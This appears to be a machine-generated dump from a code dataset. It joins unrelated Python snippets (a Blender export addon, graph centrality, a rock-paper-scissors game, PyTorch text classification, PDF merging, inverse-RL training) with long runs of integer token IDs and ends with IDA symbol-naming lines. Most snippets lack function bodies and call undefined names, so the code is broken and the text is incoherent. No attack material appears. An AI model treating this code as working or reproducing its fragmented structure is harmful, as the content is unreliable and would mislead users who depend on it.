395,
198,
6738,
555,
715,
395,
13,
76,
735,
1330,
6139,
44,
735,
11,
1908,
20538,
11,
8529,
198,
198,
6738,
1619,
34846,
13,
538,
... | 2.962963 | 108 |
from rest_framework import serializers
from rest_framework.serializers import ModelSerializer
from rest_framework.validators import UniqueValidator
from ..models.app import App, AppImage, Category
| [
6738,
1334,
62,
30604,
1330,
11389,
11341,
198,
6738,
1334,
62,
30604,
13,
46911,
11341,
1330,
9104,
32634,
7509,
198,
6738,
1334,
62,
30604,
13,
12102,
2024,
1330,
30015,
47139,
1352,
198,
198,
6738,
11485,
27530,
13,
1324,
1330,
2034,
... | 4.208333 | 48 |
import datetime
import logging
import os
import subprocess
import time
from threading import Thread
import GlobalConfig
from DataWriter import DataWriter
from FanCollector import FanCollector
from UPSCollector import UPSCollector
from SensorCollector import SensorCollector
LOG_FORMAT = "%(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
if (__name__ == "__main__"):
LBCollector().run() | [
11748,
4818,
8079,
198,
11748,
18931,
198,
11748,
28686,
198,
11748,
850,
14681,
198,
11748,
640,
198,
6738,
4704,
278,
1330,
14122,
198,
198,
11748,
8060,
16934,
198,
6738,
6060,
34379,
1330,
6060,
34379,
198,
6738,
13836,
31337,
273,
13... | 3.382813 | 128 |
bl_info = {
"name": "3D Object to Photoshop",
"description": "選択形状をPhotoshopの3Dレイヤに",
"author": "Yukimi",
"version": (0,4),
"blender": (2, 6, 0),
"location": "object",
"warning": "",
"wiki_url": "",
"tracker_url": "http://yukimi-blend.blogspot.jp/",
"category": "Import-Export"}
import bpy
from io_scene_obj import export_obj
from bpy_extras.io_utils import axis_conversion
import os
import subprocess
import time
import random
#実行するjavascriptの名前
js_name = "Add3DLayerFromFile.jsx"
#このスクリプトのあるディレクトリのパス
mydoc_dir = os.path.dirname(__file__)
#実行するスクリプトのパス
VB_Hub = os.path.abspath(os.path.join(mydoc_dir, "VB_Hub.vbs"))
jscript = os.path.abspath(os.path.join(mydoc_dir, js_name))
#Blenderの一時ファイルディレクトリを利用する場合
tmp_dir = bpy.context.user_preferences.filepaths.temporary_directory
#ファイルの書き出し先をデスクトップにしたい場合は↓をコメントアウト
#tmp_dir = os.path.join(os.getenv("HOMEDRIVE"), os.getenv("HOMEPATH") , "Desktop")
###################################################
class DupulicateActionAtCurrentTime(bpy.types.Operator):
'''selected 3D Object to Photoshop 3D Layer'''
bl_idname = "action.obj_to_photoshop"
bl_label = "3D Object to Photoshop 3D Layer"
# メニューの構築処理
# アドオン有効化時の処理
# アドオン無効化時の処理
if __name__ == "__main__":
register()
########################################################## | [
2436,
62,
10951,
796,
1391,
201,
198,
220,
220,
220,
366,
3672,
1298,
366,
18,
35,
9515,
284,
29153,
1600,
201,
198,
220,
220,
220,
366,
11213,
1298,
366,
34402,
116,
162,
232,
252,
37605,
95,
163,
232,
114,
31758,
27248,
25444,
564... | 2.024854 | 684 |
import snap
Graph = snap.GenRndGnm(snap.PNGraph, 100, 1000)
Nodes = snap.TIntFltH()
Edges = snap.TIntPrFltH()
snap.GetBetweennessCentr(Graph, Nodes, Edges, 1.0)
for node in Nodes:
print("node: %d centrality: %f" % (node, Nodes[node]))
for edge in Edges:
print("edge: (%d, %d) centrality: %f" % (edge.GetVal1(), edge.GetVal2(), Edges[edge]))
UGraph = snap.GenRndGnm(snap.PUNGraph, 100, 1000)
Nodes = snap.TIntFltH()
Edges = snap.TIntPrFltH()
snap.GetBetweennessCentr(UGraph, Nodes, Edges, 1.0)
for node in Nodes:
print("node: %d centrality: %f" % (node, Nodes[node]))
for edge in Edges:
print("edge: (%d, %d) centrality: %f" % (edge.GetVal1(), edge.GetVal2(), Edges[edge]))
Network = snap.GenRndGnm(snap.PNEANet, 100, 1000)
Nodes = snap.TIntFltH()
Edges = snap.TIntPrFltH()
snap.GetBetweennessCentr(Network, Nodes, Edges, 1.0)
for node in Nodes:
print("node: %d centrality: %f" % (node, Nodes[node]))
for edge in Edges:
print("edge: (%d, %d) centrality: %f" % (edge.GetVal1(), edge.GetVal2(), Edges[edge]))
| [
11748,
11495,
198,
198,
37065,
796,
11495,
13,
13746,
49,
358,
38,
21533,
7,
45380,
13,
47,
10503,
1470,
11,
1802,
11,
8576,
8,
198,
45,
4147,
796,
11495,
13,
51,
5317,
37,
2528,
39,
3419,
198,
7407,
3212,
796,
11495,
13,
51,
5317... | 2.2949 | 451 |
import random
Choices = ['rock','paper','scissors']
cs = 0
us = 0
u = 0
c = 0
ctr = 0
print("********************** Rock Paper Scissors **********************" )
print(" Made by Keshav Dev Kapil ")
user1 = user(input("Enter name of user1: "))
print("Welcome to Rock, Paper Scissors. How do you want to play:\n1.{} Vs Computer\n2.{} Vs friend".format(user1.name,user1.name))
chs = int(input("enter choice(1 for computer, 2 for friend): "))
if chs == 1:
while(True):
print("\nChoose your option:\nRock \nPaper \nScissors\n")
u = input("Enter your choice: ").lower()
c = computer()
if u not in Choices:
print("Enter valid choice!\n")
continue
else:
print("User Choice: {} \t Computer Choice: {}".format(u,c))
check(u,c)
print("User score: {} \t \t Computer Score: {}".format(us,cs))
if us == 3:
print("\nCongratulations, You win!")
break
elif cs == 3:
print("\nyou lost :(")
break
else:
continue
elif chs == 2:
user2 = user(input("Entee name of user2: "))
while(True):
print("\nChoose your option:\nRock \nPaper \nScissors\n")
u = input("Enter your choice, {}: ".format(user1.name)).lower()
c = input("Enter your choice, {}: ".format(user2.name)).lower()
if u not in Choices or c not in Choices:
print("Enter valid choice!\n")
continue
else:
print("{}: {} \t {}: {}".format(user1.name,u,user2.name,c))
check(u,c)
print("{}: {} \t {}: {}".format(user1.name,us,user2.name,cs))
if us == 3:
print("\nCongratulations, {} win this game!!!\n{} lost :(".format(user1.name,user2.name))
break
elif cs == 3:
print("\nCongratulations, {} win this game!!!\n{} lost :(".format(user2.name,user1.name))
break
else:
continue
| [
11748,
4738,
201,
198,
201,
198,
22164,
1063,
796,
37250,
10823,
41707,
20189,
41707,
1416,
32555,
20520,
201,
198,
6359,
796,
657,
201,
198,
385,
796,
657,
201,
198,
84,
796,
657,
201,
198,
66,
796,
657,
201,
198,
24087,
796,
657,
... | 1.927574 | 1,146 |
import os
import smtplib
import imghdr
from email.message import EmailMessage
import yfinance as yf
import datetime as dt
import pandas as pd
from pandas_datareader import data as pdr
EMAIL_ADDRESS = os.environ.get('EMAIL_USER')
EMAIL_PASSWORD = os.environ.get('EMAIL_PASS')
| [
11748,
28686,
198,
11748,
895,
83,
489,
571,
198,
11748,
545,
456,
7109,
198,
6738,
3053,
13,
20500,
1330,
9570,
12837,
198,
198,
11748,
331,
69,
14149,
355,
331,
69,
198,
11748,
4818,
8079,
355,
288,
83,
198,
11748,
19798,
292,
355,
... | 2.808081 | 99 |
import time
from collections import Counter
from functools import partial
import csv
import json
import torch
from torch import nn
from torch.utils.data import DataLoader
from torch.utils.data.dataset import random_split
from torchtext.vocab import Vocab
from gensim.scripts.glove2word2vec import glove2word2vec
import gensim
from pathlib import Path
def process_to_pytorch(file_path, max_lines):
""" process the file into a list of tuple (index, sentence)
instead of using pandas, just use csv reader
"""
# read the tsv file
tsv_file = open(file_path)
read_tsv = csv.reader(tsv_file, delimiter="\t")
list_of_tokens = []
i = 0
for row in read_tsv:
if i < max_lines:
# index
index = 0
if row[0] == "2":
index = 1
# tuple of (index, sentence)
list_of_tokens.append((index, [word.lower() for word in row[1].split(" ")]))
i += 1
tsv_file.close()
return list_of_tokens
def read_params(json_file_path):
""" Read parameters, like epochs
return as a dict of all parameters
"""
with open(json_file_path, 'r') as f:
json_params = json.load(f)
return json_params
def vocab_counter(train_dataset):
""" Calculate the number of unique vocabs in the training dataset
Return the Vocab counter and the size of the Vocab
"""
vocab = Vocab(Counter(tok for _, tokens in train_dataset for tok in tokens))
return vocab, len(vocab)
def unique_label(train_dataset):
""" Calculate the number of unique labels in the training dataset
Return the set of unique labels and the size
"""
label = set(unique for unique, _ in train_dataset)
return label, len(label)
def collate_batch(batch, vocab, device):
""" Process the dataset into applicable tensors"""
labels_list = []
tokens_list = []
offsets_list = []
last_offset = 0
for label, tokens in batch:
# Labels are already 0/1
labels_list.append(label)
offsets_list.append(last_offset)
# Increment for next sequence
last_offset += len(tokens)
token_indices = torch.tensor([vocab[tok] for tok in tokens], dtype=torch.long)
tokens_list.append(token_indices)
labels_tensor = torch.tensor(labels_list, dtype=torch.long, device=device)
tokens_tensor = torch.cat(tokens_list).to(device)
offsets_tensor = torch.tensor(offsets_list, dtype=torch.long, device=device)
return labels_tensor, tokens_tensor, offsets_tensor
if __name__ == '__main__':
main()
| [
11748,
640,
198,
6738,
17268,
1330,
15034,
198,
6738,
1257,
310,
10141,
1330,
13027,
198,
198,
11748,
269,
21370,
198,
11748,
33918,
198,
11748,
28034,
198,
6738,
28034,
1330,
299,
77,
198,
6738,
28034,
13,
26791,
13,
7890,
1330,
6060,
... | 2.561024 | 1,016 |
"""
"""
import os, sys
import argparse
import numpy as np
from signal_processing.ecg_preproc import preprocess_signal, parallel_preprocess_signal
from signal_processing.ecg_features import compute_ecg_features
from models.load_model import load_model
from models.train_model_ml import train as train_ml
from models.train_model_dl import train as train_dl
def main(**kwargs):
"""
"""
raise NotImplementedError
if __name__ == "__main__":
ap = argparse.ArgumentParser(
description="CPSC2020 extra configs",
)
ap.add_argument(
"-m", "--mode",
type=str, required=True,
help="running mode, train or inference",
dest="mode",
)
ap.add_argument(
"-v", "--verbose",
type=int, default=0,
help="set verbosity",
dest="verbose",
)
kwargs = vars(ap.parse_args())
print("passed arguments:")
print(repr(kwargs))
main(**kwargs)
| [
37811,
198,
37811,
198,
11748,
28686,
11,
25064,
198,
11748,
1822,
29572,
198,
11748,
299,
32152,
355,
45941,
198,
198,
6738,
6737,
62,
36948,
13,
721,
70,
62,
3866,
36942,
1330,
662,
14681,
62,
12683,
282,
11,
10730,
62,
3866,
14681,
... | 2.477573 | 379 |
"""Helper functions for training models.
Several of the functions below implement approximate maximum likelihood
estimation by optimizing the scaled log likelihood. The scale factor used in
these cases is the reciprocal of the "count" for the given dist, unless this
count is less than 1.0, in which case the scale factor used is 1.0. The scale
factor is included to make the logging output produced during optimization more
intuitively comprehensible. The inclusion of the scale factor typically has
little or no impact on the minimization itself.
The special-casing for small counts is necessary since the count may be zero
even when the training set is non-empty (e.g. for autoregressive sequence
distributions where the count is the number of frames rather than the
occupancy). Special-cased values are used only internally and for logging output
in the functions below, and are not part of their return values.
"""
# Copyright 2011, 2012, 2013, 2014, 2015 Matt Shannon
# This file is part of armspeech.
# See `License` for details of license and warranty.
from codedep import codeDeps
from armspeech.util.timing import timed
from armspeech.modelling import nodetree
import armspeech.modelling.dist as d
from armspeech.modelling.minimize import minimize
@codeDeps(d.Rat, d.getDefaultCreateAcc, d.getDefaultEstimateTotAux)
def expectationMaximization(distPrev, accumulate, createAcc = d.getDefaultCreateAcc(), estimateTotAux = d.getDefaultEstimateTotAux(), afterAcc = None, monotoneAux = True, verbosity = 0):
"""Performs one step of expectation maximization.
See the note in the docstring for this module for information on how the
log likelihood is scaled. This scaling has no effect on the dist returned
by this function.
"""
acc = createAcc(distPrev)
accumulate(acc)
if afterAcc is not None:
afterAcc(acc)
logLikePrev = acc.logLike()
count = acc.count()
count = max(count, 1.0)
dist, (aux, auxRat) = estimateTotAux(acc)
if monotoneAux and aux < logLikePrev:
raise RuntimeError('re-estimated auxiliary value (%s) less than previous log likelihood (%s) during expectation-maximization (count = %s)' % (aux / count, logLikePrev / count, count))
if verbosity >= 2:
print 'trainEM: logLikePrev = %s -> aux = %s (%s) (%s count)' % (logLikePrev / count, aux / count, d.Rat.toString(auxRat), count)
return dist, logLikePrev, (aux, auxRat), count
@codeDeps(d.getDefaultCreateAcc, d.getDefaultEstimateTotAux,
expectationMaximization
)
def trainEM(distInit, accumulate, createAcc = d.getDefaultCreateAcc(), estimateTotAux = d.getDefaultEstimateTotAux(), logLikePrevInit = float('-inf'), deltaThresh = 1e-8, minIterations = 1, maxIterations = None, beforeAcc = None, afterAcc = None, afterEst = None, monotone = False, monotoneAux = True, verbosity = 0):
"""Re-estimates a distribution using expectation maximization.
See the note in the docstring for this module for information on how the
log likelihood is scaled. This scaling only affects the dist returned by
this function to the extent that it effectively scales the deltaThresh
threshold used to assess convergence, and so may sometimes affect the number
of iterations of expectation maximization performed.
"""
assert minIterations >= 1
assert maxIterations is None or maxIterations >= minIterations
dist = distInit
logLikePrev = logLikePrevInit
it = 0
converged = False
while it < minIterations or (not converged) and (maxIterations is None or it < maxIterations):
if beforeAcc is not None:
beforeAcc(dist)
logLikePrevPrev = logLikePrev
if verbosity >= 2:
print 'trainEM: it %s:' % (it + 1)
dist, logLikePrev, (aux, auxRat), count = expectationMaximization(dist, accumulate, createAcc = createAcc, estimateTotAux = estimateTotAux, afterAcc = afterAcc, monotoneAux = monotoneAux, verbosity = verbosity)
deltaLogLikePrev = logLikePrev - logLikePrevPrev
if monotone and deltaLogLikePrev < 0.0:
raise RuntimeError('log likelihood decreased during expectation-maximization')
if verbosity >= 2:
print 'trainEM: deltaLogLikePrev = %s' % (deltaLogLikePrev / count)
if afterEst is not None:
afterEst(dist = dist, it = it)
converged = (abs(deltaLogLikePrev) <= deltaThresh * count)
it += 1
if verbosity >= 1:
if converged:
print 'trainEM: converged at thresh', deltaThresh, 'in', it, 'iterations'
else:
print 'trainEM: did NOT converge at thresh', deltaThresh, 'in', it, 'iterations'
return dist
# FIXME : try alternative minimizers (e.g. LBFGS, minFunc)
@codeDeps(d.getDefaultParamSpec, minimize)
def trainCG(distInit, accumulate, ps = d.getDefaultParamSpec(), length = -50, verbosity = 0):
"""Re-estimates a distribution using a conjugate gradient optimizer.
See the note in the docstring for this module for information on how the
log likelihood is scaled. This scaling is presumed to have only a small
impact on the dist returned by this function.
"""
# (FIXME : investigate how large the effect of the scale factor is for
# a few example dists?)
params = ps.params(distInit)
if verbosity >= 2:
print 'trainCG: initial params =', params
print 'trainCG: initial derivParams =', -negLogLike_derivParams(params)[1]
params, negLogLikes, lengthUsed = minimize(negLogLike_derivParams, params, length = length, verbosity = verbosity)
if verbosity >= 3:
print 'trainCG: logLikes =', map(lambda x: -x, negLogLikes)
if verbosity >= 2:
print 'trainCG: final params =', params
print 'trainCG: final derivParams =', -negLogLike_derivParams(params)[1]
if verbosity >= 1:
print 'trainCG: logLike %s -> %s (delta = %s)' % (-negLogLikes[0], -negLogLikes[-1], negLogLikes[0] - negLogLikes[-1])
print 'trainCG: (used', lengthUsed, 'function evaluations)'
dist = ps.parseAll(distInit, params)
return dist
@codeDeps(d.getDefaultCreateAcc, d.getDefaultEstimateTotAux,
d.getDefaultParamSpec, expectationMaximization, timed, trainCG
)
def trainCGandEM(distInit, accumulate, ps = d.getDefaultParamSpec(), createAccEM = d.getDefaultCreateAcc(), estimateTotAux = d.getDefaultEstimateTotAux(), iterations = 5, length = -50, afterEst = None, verbosity = 0):
"""Re-estimates a distribution using conjugate gradients and EM.
See the note in the docstring for this module for information on how the
log likelihood is scaled. This scaling is presumed to have only a small
impact on the dist returned by this function (via its impact on trainCG).
"""
assert iterations >= 1
dist = distInit
for it in range(1, iterations + 1):
if verbosity >= 1:
print 'trainCGandEM: starting it =', it, 'of CG and EM'
dist = (timed(trainCG) if verbosity >= 2 else trainCG)(dist, accumulate, ps = ps, length = length, verbosity = verbosity)
dist, _, _, _ = expectationMaximization(dist, accumulate, createAcc = createAccEM, estimateTotAux = estimateTotAux, verbosity = verbosity)
if afterEst is not None:
afterEst(dist = dist, it = it)
if verbosity >= 1:
print 'trainCGandEM: finished it =', it, 'of CG and EM'
print 'trainCGandEM:'
return dist
@codeDeps(d.LinearGaussianAcc, d.estimateInitialMixtureOfTwoExperts)
| [
37811,
47429,
5499,
329,
3047,
4981,
13,
198,
198,
14945,
286,
262,
5499,
2174,
3494,
27665,
5415,
14955,
198,
395,
18991,
416,
45780,
262,
27464,
2604,
14955,
13,
383,
5046,
5766,
973,
287,
198,
27218,
2663,
318,
262,
48135,
286,
262,
... | 2.987684 | 2,517 |
import tempfile
import shutil
from unittest import TestCase
from unittest import mock
from lineflow import download
from lineflow.datasets.wmt14 import Wmt14, get_wmt14
| [
11748,
20218,
7753,
198,
11748,
4423,
346,
198,
6738,
555,
715,
395,
1330,
6208,
20448,
198,
6738,
555,
715,
395,
1330,
15290,
198,
198,
6738,
1627,
11125,
1330,
4321,
198,
6738,
1627,
11125,
13,
19608,
292,
1039,
13,
86,
16762,
1415,
... | 3.288462 | 52 |
from django.urls import path
from . import consumers
app_name = 'chat'
url_patterns = [
path('thread/<int:thread_id>/', consumers.ChatConsumer.as_asgi())
]
| [
6738,
42625,
14208,
13,
6371,
82,
1330,
3108,
198,
198,
6738,
764,
1330,
7008,
628,
198,
1324,
62,
3672,
796,
705,
17006,
6,
198,
198,
6371,
62,
33279,
82,
796,
685,
198,
220,
220,
3108,
10786,
16663,
14,
27,
600,
25,
16663,
62,
3... | 2.716667 | 60 |
#!/usr/bin/python
print('merging pdfs for filtered companies')
import os
import pandas as pd
import sys
from PyPDF2 import PdfFileMerger, PdfFileReader
from pathlib import Path
pd.options.mode.chained_assignment = None # default='warn'
pd.options.mode.use_inf_as_na = True
# set directories and files
cwd = os.getcwd()
input_folder = "0_input"
output_folder = "0_output"
charts_folder = "5_charts"
# tickers processed - 5_df_output_unflitered.xlsx, properly sorting them
five_df_output_unflitered = pd.read_excel(os.path.join(cwd,"5_df_output_unflitered.xlsx"), index_col=None)
five_df_output_unflitered = five_df_output_unflitered.sort_values(['country','industry','EV'], ascending=[True, True, False])
df_symbols = five_df_output_unflitered['symbol'].drop_duplicates().reset_index(drop=False).drop(columns='index')
# Create a new PdfFileWriter object which represents a blank PDF document
merger = PdfFileMerger()
# https://stackoverflow.com/questions/17104926/pypdf-merging-multiple-pdf-files-into-one-pdf
# Loop through pdfs and append them to each other
# first loop through non-stock pdfs
paths = Path(os.path.join(cwd,input_folder,charts_folder)).glob('**/*.pdf')
for path in paths:
try:
path_in_str = str(path)
path_to_folder_only = os.path.join(cwd,input_folder,charts_folder)
name_path_reduced_one = path_in_str.replace(path_to_folder_only, '')
name_path_reduced_two = name_path_reduced_one.replace('.pdf', '')
name_df = name_path_reduced_two.split('\\')
pdf_name = name_df[1]
if pdf_name not in df_symbols.values:
try:
merger.append(PdfFileReader(open(path_in_str, 'rb')))
except:
pass
except:
pass
# now loop only through stocks and in a very specific order
for s in df_symbols['symbol']:
paths = Path(os.path.join(cwd,input_folder,charts_folder)).glob('**/*.pdf')
#print(s)
for path in paths:
path_in_str = str(path)
path_to_folder_only = os.path.join(cwd,input_folder,charts_folder)
name_path_reduced_one = path_in_str.replace(path_to_folder_only, '')
name_path_reduced_two = name_path_reduced_one.replace('.pdf', '')
name_df = name_path_reduced_two.split('\\')
pdf_name = name_df[1]
if str(pdf_name) == str(s):
print(pdf_name)
merger.append(PdfFileReader(open(path_in_str, 'rb')))
#print(path_in_str)
#save to one large pdf
Charts = '5_Charts.pdf'
merger.write(os.path.join(cwd,Charts))
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
4798,
10786,
647,
2667,
37124,
82,
329,
29083,
2706,
11537,
198,
198,
11748,
28686,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
25064,
198,
6738,
9485,
20456,
17,
1330,
350,
7568,
8979,
... | 2.338235 | 1,088 |
"""
Tests of the transforms
"""
import pytest
from limnos.types import Route
from limnos.transforms import (bender,
flipper,
flattener,
Chirality)
two_point_routes = [[(1, 1), (3, 1)],
[(1, 1), (1, 3)],
[(1, 1), (-1, 1)],
[(1, 1), (1, -1)],
[(11, 5), (11, 3)]]
three_point_routes = [[(1, 1), (1, 3), (3, 3)],
[(1, 1), (1, 3), (-1, 3)],
[(1, 1), (3, 1), (3, 3)],
[(1, 1), (3, 1), (3, -1)],
[(1, 1), (1, -1), (3, -1)],
[(1, 1), (1, -1), (-1, -1)],
[(1, 1), (-1, 1), (-1, 3)],
[(1, 1), (-1, 1), (-1, -1)],
[(7, 9), (7, 11), (9, 11)]
]
@pytest.mark.parametrize("route", three_point_routes)
@pytest.mark.parametrize("chirality", (Chirality.RIGHT, Chirality.LEFT))
@pytest.mark.parametrize("route", two_point_routes)
| [
37811,
198,
51,
3558,
286,
262,
31408,
198,
37811,
198,
11748,
12972,
9288,
198,
198,
6738,
1761,
39369,
13,
19199,
1330,
18956,
198,
6738,
1761,
39369,
13,
7645,
23914,
1330,
357,
45666,
11,
198,
220,
220,
220,
220,
220,
220,
220,
22... | 1.511111 | 720 |
import threading
from funcy import cached_property, wrap_prop
from dvc.scheme import Schemes
# pylint:disable=abstract-method
from .base import ObjectFileSystem
| [
11748,
4704,
278,
198,
198,
6738,
1257,
948,
1330,
39986,
62,
26745,
11,
14441,
62,
22930,
198,
198,
6738,
288,
28435,
13,
15952,
1326,
1330,
1446,
4411,
274,
198,
198,
2,
279,
2645,
600,
25,
40223,
28,
397,
8709,
12,
24396,
198,
67... | 3.3 | 50 |
# Copyright (c) 2017 Jonathan Bassen, Stanford University
import os
import tornado.escape as escape
import tornado.gen as gen
import tornado.httputil as httputil
import tornado.web as web
import urllib
from db import upsert_activity_data
@gen.coroutine
| [
2,
15069,
357,
66,
8,
2177,
11232,
19829,
268,
11,
13863,
2059,
198,
198,
11748,
28686,
198,
11748,
33718,
13,
41915,
355,
6654,
198,
11748,
33718,
13,
5235,
355,
2429,
198,
11748,
33718,
13,
2804,
1996,
346,
355,
1841,
1996,
346,
198... | 3.547945 | 73 |
import tensorflow as tf
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
from core.generator import Generator
from core.discriminator import Discriminator
from core.gan import GAN
import pickle
import argparse
parser = argparse.ArgumentParser(description='Testing')
parser.add_argument('--word_to_idx_dir', type=str, required=True)
parser.add_argument('--image', type=str, required=True)
parser.add_argument('--max_length', type=int, default=25)
parser.add_argument('--load_model_dir', type=str, required=True)
args = parser.parse_args()
if __name__ == "__main__":
main() | [
11748,
11192,
273,
11125,
355,
48700,
198,
27110,
13,
5589,
265,
13,
85,
16,
13,
6404,
2667,
13,
2617,
62,
19011,
16579,
7,
27110,
13,
5589,
265,
13,
85,
16,
13,
6404,
2667,
13,
24908,
8,
198,
6738,
4755,
13,
8612,
1352,
1330,
359... | 2.955446 | 202 |
#!/usr/bin/env python3
#! -*-conding:utf-8 -*-
#!@Time :2018/4/11 17:14
#!@Author :@liuweqia
#!@File :class.py
import pygame,random
from pygame.locals import *
from pygame import Rect
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
0,
532,
9,
12,
17561,
278,
25,
40477,
12,
23,
532,
9,
12,
198,
198,
2,
0,
31,
7575,
220,
220,
1058,
7908,
14,
19,
14,
1157,
1596,
25,
1415,
198,
2,
0,
31,
13838,
1058,... | 2.181818 | 88 |
from rest_framework import serializers
from hyper_resource.serializers import BusinessSerializer
from scrum.models import *
from rest_framework_gis.serializers import GeoFeatureModelSerializer
from rest_framework.serializers import ModelSerializer, HyperlinkedRelatedField
| [
6738,
1334,
62,
30604,
1330,
11389,
11341,
201,
198,
201,
198,
6738,
8718,
62,
31092,
13,
46911,
11341,
1330,
7320,
32634,
7509,
201,
198,
6738,
6040,
388,
13,
27530,
1330,
1635,
201,
198,
6738,
1334,
62,
30604,
62,
70,
271,
13,
46911... | 3.542169 | 83 |
# used to change marker on players turn
# Sets up initital empty grid
grid = [
[" ", " ", " "],
[" ", " ", " "],
[" ", " ", " "]
]
valid = ["1", "2", "3"]
numbers = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
coordinates_states = {
0: "You should enter numbers!",
1: "Coordinates should be from 1 to 3!",
2: "This cell is occupied! Choose another one!"
}
game_states = {
0: "Game not finished",
1: "Draw",
2: "X wins",
3: "O wins",
4: "Impossible",
}
win_combos = [[grid[0][0], grid[0][1], grid[0][2]],
[grid[1][0], grid[1][1], grid[1][2]],
[grid[2][0], grid[2][1], grid[2][2]],
[grid[0][0], grid[1][0], grid[2][0]],
[grid[0][1], grid[1][1], grid[2][1]],
[grid[0][2], grid[1][2], grid[2][2]],
[grid[0][0], grid[1][1], grid[2][2]],
[grid[2][0], grid[1][1], grid[0][2]]]
# This part of the script actually lets the game run
print_board()
make_move()
| [
628,
198,
198,
2,
973,
284,
1487,
18364,
319,
1938,
1210,
628,
198,
2,
21394,
510,
2315,
1287,
6565,
10706,
198,
25928,
796,
685,
198,
220,
220,
220,
14631,
33172,
366,
33172,
366,
366,
4357,
198,
220,
220,
220,
14631,
33172,
366,
3... | 1.982318 | 509 |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import random
from op_test import OpTest
if __name__ == '__main__':
unittest.main()
| [
2,
220,
220,
15069,
357,
66,
8,
2864,
350,
37382,
47,
37382,
46665,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
... | 3.582569 | 218 |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
node.py
------
This file is part of NODE - the NORX Differential-Search Engine.
:copyright: (c) 2014 Philipp Jovanovic <philipp@jovanovic.io>
:license: BSD (3-Clause), see LICENSE
"""
__author__ = 'Philipp Jovanovic'
__email__ = 'philipp@jovanovic.io'
__version__ = 'v20141009'
__license__ = 'BSD (3-Clause)'
__description__='NODE: the (NO)RX (D)ifferential-Search (E)ngine'
import sys
import argparse
import src.utils as utils
import config.cmd as cmd
if __name__ == '__main__':
sys.exit(main())
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
21004,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
220,
220,
220,
10139,
13,
9078,
198,
220,
220,
220,
40103,
628,
220,
220,
220,
770,
2393,
318,
636,
286,
... | 2.550661 | 227 |
import threading
import numpy as np
import ImageAnalyzer
import cv2
from PyQt5 import QtGui
import matplotlib.pyplot as plt
| [
11748,
4704,
278,
198,
11748,
299,
32152,
355,
45941,
198,
198,
11748,
7412,
37702,
9107,
198,
198,
11748,
269,
85,
17,
198,
6738,
9485,
48,
83,
20,
1330,
33734,
8205,
72,
198,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,... | 2.866667 | 45 |
__author__ = 'socialmoneydev'
from jsonBase import JsonBase
| [
834,
9800,
834,
796,
705,
14557,
26316,
7959,
6,
198,
6738,
33918,
14881,
1330,
449,
1559,
14881,
628
] | 3.388889 | 18 |
import tensorflow as tf
from sandbox.rocky.tf.policies.gaussian_mlp_policy import GaussianMLPPolicy
from sandbox.rocky.tf.envs.base import TfEnv
from rllab.baselines.linear_feature_baseline import LinearFeatureBaseline
from rllab.envs.gym_env import GymEnv
from inverse_rl.algos.irl_trpo import IRLTRPO
from inverse_rl.models.imitation_learning import AIRLStateAction
from inverse_rl.models.airl_state import *
from inverse_rl.utils.log_utils import rllab_logdir, load_latest_experts
from inverse_rl.utils.hyper_sweep import run_sweep_parallel, run_sweep_serial
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--visible_gpus', type=str, default='0')
parser.add_argument('--fusion', action='store_false')
parser.add_argument('--debug', action='store_true')
parser.add_argument('--exp_folder', type=str)
parser.add_argument('--state_only', action="store_true")
parser.add_argument('--score_discrim', action="store_true")
args = parser.parse_args()
params_dict = {
'fusion': [args.fusion],
'visible_gpus': [args.visible_gpus],
'exp_folder': [args.exp_folder],
'debug' : [args.debug],
'state_only': [args.state_only],
'score_discrim': [args.score_discrim],
}
if args.debug == True:
main(fusion=args.fusion, debug=args.debug, visible_gpus=args.visible_gpus, \
exp_folder=args.exp_folder, state_only=args.state_only, \
score_discrim=args.score_discrim)
else:
run_sweep_parallel(main, params_dict, repeat=2) | [
11748,
11192,
273,
11125,
355,
48700,
198,
198,
6738,
35204,
13,
10823,
88,
13,
27110,
13,
79,
4160,
444,
13,
4908,
31562,
62,
4029,
79,
62,
30586,
1330,
12822,
31562,
5805,
10246,
21424,
198,
6738,
35204,
13,
10823,
88,
13,
27110,
13... | 2.523585 | 636 |
set_name(0x8014AFA0, "EA_cd_seek", SN_NOWARN)
set_name(0x8014AFA8, "MY_CdGetSector", SN_NOWARN)
set_name(0x8014AFDC, "init_cdstream", SN_NOWARN)
set_name(0x8014AFEC, "flush_cdstream", SN_NOWARN)
set_name(0x8014B010, "check_complete_frame", SN_NOWARN)
set_name(0x8014B090, "reset_cdstream", SN_NOWARN)
set_name(0x8014B0B8, "kill_stream_handlers", SN_NOWARN)
set_name(0x8014B118, "stream_cdready_handler", SN_NOWARN)
set_name(0x8014B30C, "CD_stream_handler", SN_NOWARN)
set_name(0x8014B3EC, "install_stream_handlers", SN_NOWARN)
set_name(0x8014B45C, "cdstream_service", SN_NOWARN)
set_name(0x8014B4F4, "cdstream_get_chunk", SN_NOWARN)
set_name(0x8014B618, "cdstream_is_last_chunk", SN_NOWARN)
set_name(0x8014B630, "cdstream_discard_chunk", SN_NOWARN)
set_name(0x8014B730, "close_cdstream", SN_NOWARN)
set_name(0x8014B7A8, "open_cdstream", SN_NOWARN)
set_name(0x8014B940, "set_mdec_img_buffer", SN_NOWARN)
